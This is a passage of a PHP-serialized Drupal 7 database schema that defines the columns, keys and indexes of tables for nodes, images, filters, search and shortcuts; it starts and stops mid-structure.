null\";b:1;}s:14:\"field_tags_tid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:6:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:11:\"revision_id\";i:3;s:7:\"deleted\";i:4;s:5:\"delta\";i:5;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:14:\"field_tags_tid\";a:1:{i:0;s:14:\"field_tags_tid\";}}s:12:\"foreign keys\";a:1:{s:14:\"field_tags_tid\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:14:\"field_tags_tid\";s:3:\"tid\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:25:\"field_revision_field_tags\";}s:22:\"field_data_field_image\";a:6:{s:6:\"fields\";a:12:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:15:\"field_image_fid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:0;s:8:\"unsigned\";b:1;}s:15:\"field_image_alt\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:512;s:8:\"not null\";b:0;}s:17:\"field_image_title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:1024;s:8:\"not null\";b:0;}s:17:\"field_image_width\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}s:18:\"field_image_height\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}}s:11:\"primary key\";a:5:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:7:\"deleted\";i:3;s:5:\"delta\";i:4;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:15:\"field_image_fid\";a:1:{i:0;s:15:\"field_image_fid\";}}s:12:\"foreign keys\";a:1:{s:15:\"field_image_fid\";a:2:{s:5:\"table\";s:12:\"file_managed\";s:7:\"columns\";a:1:{s:15:\"field_image_fid\";s:3:\"fid\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:22:\"field_data_field_image\";}s:26:\"field_revision_field_image\";a:6:{s:6:\"fields\";a:12:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:15:\"field_image_fid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:0;s:8:\"unsigned\";b:1;}s:15:\"field_image_alt\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:512;s:8:\"not null\";b:0;}s:17:\"field_image_title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:1024;s:8:\"not null\";b:0;}s:17:\"field_image_width\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}s:18:\"field_image_height\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}}s:11:\"primary key\";a:6:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:11:\"revision_id\";i:3;s:7:\"deleted\";i:4;s:5:\"delta\";i:5;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:15:\"field_image_fid\";a:1:{i:0;s:15:\"field_image_fid\";}}s:12:\"foreign keys\";a:1:{s:15:\"field_image_fid\";a:2:{s:5:\"table\";s:12:\"file_managed\";s:7:\"columns\";a:1:{s:15:\"field_image_fid\";s:3:\"fid\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:26:\"field_revision_field_image\";}s:6:\"filter\";a:5:{s:6:\"fields\";a:6:{s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"settings\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:11:\"primary key\";a:2:{i:0;s:6:\"format\";i:1;s:4:\"name\";}s:7:\"indexes\";a:1:{s:4:\"list\";a:3:{i:0;s:6:\"weight\";i:1;s:6:\"module\";i:2;s:4:\"name\";}}s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:6:\"filter\";}s:13:\"filter_format\";a:6:{s:6:\"fields\";a:5:{s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:5:\"cache\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"status\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:1;s:4:\"size\";s:4:\"tiny\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:6:\"format\";}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:7:\"indexes\";a:1:{s:13:\"status_weight\";a:2:{i:0;s:6:\"status\";i:1;s:6:\"weight\";}}s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:13:\"filter_format\";}s:12:\"cache_filter\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:12:\"cache_filter\";}s:11:\"cache_image\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:5:\"image\";s:4:\"name\";s:11:\"cache_image\";}s:12:\"image_styles\";a:5:{s:6:\"fields\";a:3:{s:4:\"isid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:5:\"label\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"isid\";}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:6:\"module\";s:5:\"image\";s:4:\"name\";s:12:\"image_styles\";}s:13:\"image_effects\";a:6:{s:6:\"fields\";a:5:{s:4:\"ieid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"isid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"weight\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:0;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"ieid\";}s:7:\"indexes\";a:2:{s:4:\"isid\";a:1:{i:0;s:4:\"isid\";}s:6:\"weight\";a:1:{i:0;s:6:\"weight\";}}s:12:\"foreign keys\";a:1:{s:11:\"image_style\";a:2:{s:5:\"table\";s:12:\"image_styles\";s:7:\"columns\";a:1:{s:4:\"isid\";s:4:\"isid\";}}}s:6:\"module\";s:5:\"image\";s:4:\"name\";s:13:\"image_effects\";}s:11:\"menu_custom\";a:4:{s:6:\"fields\";a:3:{s:9:\"menu_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:11:\"description\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:12:\"translatable\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:9:\"menu_name\";}s:6:\"module\";s:4:\"menu\";s:4:\"name\";s:11:\"menu_custom\";}s:4:\"node\";a:7:{s:6:\"fields\";a:14:{s:3:\"nid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;s:7:\"default\";N;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"tnid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"translate\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:10:{s:12:\"node_changed\";a:1:{i:0;s:7:\"changed\";}s:12:\"node_created\";a:1:{i:0;s:7:\"created\";}s:14:\"node_frontpage\";a:4:{i:0;s:7:\"promote\";i:1;s:6:\"status\";i:2;s:6:\"sticky\";i:3;s:7:\"created\";}s:16:\"node_status_type\";a:3:{i:0;s:6:\"status\";i:1;s:4:\"type\";i:2;s:3:\"nid\";}s:15:\"node_title_type\";a:2:{i:0;s:5:\"title\";i:1;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:9:\"node_type\";a:1:{i:0;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:4:\"tnid\";a:1:{i:0;s:4:\"tnid\";}s:9:\"translate\";a:1:{i:0;s:9:\"translate\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}}s:11:\"unique keys\";a:1:{s:3:\"vid\";a:1:{i:0;s:3:\"vid\";}}s:12:\"foreign keys\";a:2:{s:13:\"node_revision\";a:2:{s:5:\"table\";s:13:\"node_revision\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}s:11:\"node_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:4:\"node\";}s:11:\"node_access\";a:5:{s:6:\"fields\";a:6:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"gid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"realm\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:10:\"grant_view\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:12:\"grant_update\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:12:\"grant_delete\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}}s:11:\"primary key\";a:3:{i:0;s:3:\"nid\";i:1;s:3:\"gid\";i:2;s:5:\"realm\";}s:12:\"foreign keys\";a:1:{s:13:\"affected_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:11:\"node_access\";}s:13:\"node_revision\";a:6:{s:6:\"fields\";a:10:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"log\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:12:\"foreign keys\";a:2:{s:14:\"versioned_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"version_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:13:\"node_revision\";}s:9:\"node_type\";a:4:{s:6:\"fields\";a:13:{s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:4:\"base\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"module\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:6:\"medium\";s:12:\"translatable\";b:1;}s:4:\"help\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:6:\"medium\";s:12:\"translatable\";b:1;}s:9:\"has_title\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:4:\"size\";s:4:\"tiny\";}s:11:\"title_label\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:6:\"custom\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:8:\"modified\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:8:\"disabled\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:9:\"orig_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"type\";}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:9:\"node_type\";}s:15:\"block_node_type\";a:5:{s:6:\"fields\";a:3:{s:6:\"module\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:5:\"delta\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:3:{i:0;s:6:\"module\";i:1;s:5:\"delta\";i:2;s:4:\"type\";}s:7:\"indexes\";a:1:{s:4:\"type\";a:1:{i:0;s:4:\"type\";}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:15:\"block_node_type\";}s:7:\"history\";a:5:{s:6:\"fields\";a:3:{s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"nid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:2:{i:0;s:3:\"uid\";i:1;s:3:\"nid\";}s:7:\"indexes\";a:1:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:7:\"history\";}s:11:\"rdf_mapping\";a:4:{s:6:\"fields\";a:3:{s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:6:\"bundle\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:7:\"mapping\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:11:\"primary key\";a:2:{i:0;s:4:\"type\";i:1;s:6:\"bundle\";}s:6:\"module\";s:3:\"rdf\";s:4:\"name\";s:11:\"rdf_mapping\";}s:14:\"search_dataset\";a:4:{s:6:\"fields\";a:4:{s:3:\"sid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:16;s:8:\"not null\";b:1;}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:7:\"reindex\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:2:{i:0;s:3:\"sid\";i:1;s:4:\"type\";}s:6:\"module\";s:6:\"search\";s:4:\"name\";s:14:\"search_dataset\";}s:12:\"search_index\";a:6:{s:6:\"fields\";a:4:{s:4:\"word\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:50;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"sid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:16;s:8:\"not null\";b:1;}s:5:\"score\";a:2:{s:4:\"type\";s:5:\"float\";s:8:\"not null\";b:0;}}s:7:\"indexes\";a:1:{s:8:\"sid_type\";a:2:{i:0;s:3:\"sid\";i:1;s:4:\"type\";}}s:12:\"foreign keys\";a:1:{s:14:\"search_dataset\";a:2:{s:5:\"table\";s:14:\"search_dataset\";s:7:\"columns\";a:2:{s:3:\"sid\";s:3:\"sid\";s:4:\"type\";s:4:\"type\";}}}s:11:\"primary key\";a:3:{i:0;s:4:\"word\";i:1;s:3:\"sid\";i:2;s:4:\"type\";}s:6:\"module\";s:6:\"search\";s:4:\"name\";s:12:\"search_index\";}s:12:\"search_total\";a:4:{s:6:\"fields\";a:2:{s:4:\"word\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:50;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"count\";a:2:{s:4:\"type\";s:5:\"float\";s:8:\"not null\";b:0;}}s:11:\"primary key\";a:1:{i:0;s:4:\"word\";}s:6:\"module\";s:6:\"search\";s:4:\"name\";s:12:\"search_total\";}s:17:\"search_node_links\";a:5:{s:6:\"fields\";a:4:{s:3:\"sid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:16;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"caption\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}}s:11:\"primary key\";a:3:{i:0;s:3:\"sid\";i:1;s:4:\"type\";i:2;s:3:\"nid\";}s:7:\"indexes\";a:1:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}}s:6:\"module\";s:6:\"search\";s:4:\"name\";s:17:\"search_node_links\";}s:12:\"shortcut_set\";a:5:{s:6:\"fields\";a:2:{s:8:\"set_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:8:\"set_name\";}s:12:\"foreign keys\";a:1:{s:9:\"menu_name\";a:2:{s:5:\"table\";s:10:\"menu_links\";s:7:\"columns\";a:1:{s:8:\"set_name\";s:9:\"menu_name\";}}}s:6:\"module\";s:8:\"shortcut\";s:4:\"name\";s:12:\"shortcut_set\";}s:18:\"shortcut_set_users\";a:6:{s:6:\"fields\";a:2:{s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"set_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"uid\";}s:7:\"indexes\";a:1:{s:8:\"set_name\";a:1:{i:0;s:8:\"set_name\";}}s:12:\"foreign 